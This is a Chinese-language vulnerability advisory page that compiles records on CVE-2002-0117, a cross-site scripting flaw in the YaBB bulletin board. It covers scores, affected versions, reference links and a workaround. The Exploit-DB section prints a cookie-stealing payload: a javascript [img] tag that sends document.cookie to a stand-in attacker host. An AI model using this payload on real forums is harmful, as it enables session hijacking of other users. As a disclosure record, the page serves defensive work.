CVE-2002-0117
CVSS7.5
发布时间 :2002-03-25 00:00:00
修订时间 :2008-09-05 16:27:13
NMCOE    

[原文]Cross-site scripting vulnerability in Yet Another Bulletin Board (YaBB) 1 Gold SP 1 and earlier allows remote attackers to execute arbitrary script and steal cookies via a message containing encoded Javascript in an IMG tag.


[CNNVD]YABB跨站脚本执行漏洞(CNNVD-200203-090)

        
        YaBB(Yet Another Bulletin Board)是一款免费开放源码的WEB论坛/社区程序,由PERL语言实现,可以运行在unix/linux、MacOS、Microsoft Windows 9x/ME/NT/2000/XP系统平台下。
        YaBB对用户输入过滤上存在漏洞,可使远程攻击者利用在论坛上发贴对其他浏览用户进行跨站脚本执行攻击。
        YaBB支持在帖子中用户使用[img][/img]标记插入图象连接,但它未对标记中的内容做充分过滤,这可能导致攻击者在此标记的内容中放入脚本代码,当其他用户浏览相关此连接的时候,脚本将在用户的浏览器中执行。攻击者可能借此得到用户基于COOKIE的认证信息。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:yabb:yabb:2000-09-01
cpe:/a:yabb:yabb:0.01_release:gold
cpe:/a:yabb:yabb:0.01_sp1:gold
cpe:/a:yabb:yabb:2000-09-11

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0117
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0117
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-090
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/7840.php
(VENDOR_ADVISORY)  XF  yabb-encoded-css(7840)
http://online.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3828
(VENDOR_ADVISORY)  BID  3828
http://online.securityfocus.com/archive/1/249031
(VENDOR_ADVISORY)  BUGTRAQ  20020108 CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]
http://www.yabbforum.com/
(UNKNOWN)  CONFIRM  http://www.yabbforum.com/
http://www.osvdb.org/2019
(UNKNOWN)  OSVDB  2019

- 漏洞信息

YABB跨站脚本执行漏洞
高危 未知
2002-03-25 00:00:00 2005-05-02 00:00:00
远程  
        
        YaBB(Yet Another Bulletin Board)是一款免费开放源码的WEB论坛/社区程序,由PERL语言实现,可以运行在unix/linux、MacOS、Microsoft Windows 9x/ME/NT/2000/XP系统平台下。
        YaBB对用户输入过滤上存在漏洞,可使远程攻击者利用在论坛上发贴对其他浏览用户进行跨站脚本执行攻击。
        YaBB支持在帖子中用户使用[img][/img]标记插入图象连接,但它未对标记中的内容做充分过滤,这可能导致攻击者在此标记的内容中放入脚本代码,当其他用户浏览相关此连接的时候,脚本将在用户的浏览器中执行。攻击者可能借此得到用户基于COOKIE的认证信息。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修复之前暂时关闭Image标记的使用。
        厂商补丁:
        YaBB
        ----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.yabbforum.com/

- 漏洞信息 (21208)

YaBB 9.1.2000 Cross-Agent Scripting Vulnerability (EDBID:21208)
cgi webapps
2002-01-09 Verified
0 Obscure
N/A [点击下载]
source: http://www.securityfocus.com/bid/3828/info

YaBB (Yet Another Bulletin Board) is freely available web forums/community software that is written in Perl. YaBB will run on most Unix/Linux variants, MacOS, and Microsoft Windows 9x/ME/NT/2000/XP platforms.

YaBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running YaBB.

This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials.

[img]javascript:document.write
('&#x3cimg
src=http://attackerssite/tools/cookie.plx?cookie='+escape(docu
ment.cookie)+'&#x3e')
[/img] 		

- 漏洞信息

2019
YaBB IMG Tag XSS
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

YaBB contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the application does not validate content inserted into [IMG][/IMG] image links upon submission to the script that handles forum messages and replies. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

- 时间线

2002-01-08 Unknow
2002-01-08 2002-03-23

- 解决方案

Upgrade to version 1 Gold SP 1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站